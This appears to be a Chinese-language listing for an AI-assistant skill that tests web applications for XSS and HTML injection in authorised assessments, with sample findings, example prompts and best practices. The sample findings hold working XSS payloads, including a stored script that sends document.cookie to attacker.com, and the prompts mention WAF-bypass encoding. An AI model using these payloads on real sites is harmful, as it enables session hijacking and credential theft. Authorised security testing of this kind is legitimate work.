xss-html-injection
测试 XSS 和 HTML 注入漏洞
Web 应用程序通常包含跨站脚本和 HTML 注入缺陷,攻击者可利用这些缺陷窃取会话和凭证。本技能提供了系统化的方法论,用于在授权的安全评估中检测、利用和验证客户端注入漏洞。
下载技能 ZIP
在 Claude 中上传
前往 设置 → 功能 → 技能 → 上传技能
开启并开始使用
测试它
正在使用“xss-html-injection”。 测试搜索参数的反射型 XSS
预期结果:
- 发现漏洞:/search?q= 参数存在反射型 XSS
- 严重程度:中等
- 载荷:<img src=x onerror=alert(document.domain)>
- 上下文:HTML 主体 - 未编码的反射
- 建议:对所有用户输入实施输出编码
正在使用“xss-html-injection”。 测试用户个人资料简介字段的存储型 XSS
预期结果:
- 发现漏洞:用户个人资料简介存在存储型 XSS
- 严重程度:高(持久性,影响所有用户)
- 载荷:<script>fetch('https://attacker.com/log?c='+document.cookie)</script>
- 影响:所有查看个人资料的用户都会遭会话劫持
- 建议:实施严格的输入验证和输出编码
安全审计
安全This is a legitimate security testing skill for XSS and HTML injection vulnerability assessment. All 121 static findings are FALSE POSITIVES - they represent educational examples of vulnerable code patterns (eval, innerHTML, document.write) and demonstration payloads using example URLs (attacker.com). The skill teaches security professionals how to identify and test for client-side injection vulnerabilities in authorized penetration tests.
低风险问题 (1)
风险因素
⚡ 包含脚本 (7)
⚙️ 外部命令 (64)
🌐 网络访问 (27)
📁 文件系统访问 (1)
检测到的模式
质量评分
你能构建什么
安全顾问测试 Web 应用程序
进行授权渗透测试,识别客户 Web 应用程序中的 XSS 漏洞并提供修复建议。
开发人员验证输入处理
在开发过程中测试自定义 Web 应用程序,验证是否正确实施了输入清理和输出编码。
QA 工程师执行安全回归测试
在安全回归测试套件中包含 XSS 和 HTML 注入测试,以便在生产部署前发现漏洞。
试试这些提示
使用 XSS HTML 注入技能测试 https://example.com 的登录表单是否存在反射型 XSS 漏洞。识别所有输入字段并测试基本 XSS 载荷。
使用 XSS HTML 注入技能测试评论区的存储型 XSS。创建持久化并在其他用户查看内容时执行的测试载荷。
使用 XSS HTML 注入技能分析 https://example.com/dashboard 的 JavaScript 代码以查找基于 DOM 的 XSS。检查 location.hash 和 location.search 的处理方式。
使用 XSS HTML 注入技能测试 https://example.com 的 WAF 是否阻止常见的 XSS 载荷。尝试 HTML 编码、Unicode 编码和标签变体绕过技术。
最佳实践
- 测试任何目标应用程序前务必获取书面授权
- 使用受控的演示载荷,不会持久化或传播到非目标用户
- 通过适当的事件响应渠道立即报告严重漏洞
避免
- 未经明确书面授权测试生产系统
- 将发现的漏洞用于未授权的访问或数据泄露
- 部署可能导致拒绝服务或系统损坏的载荷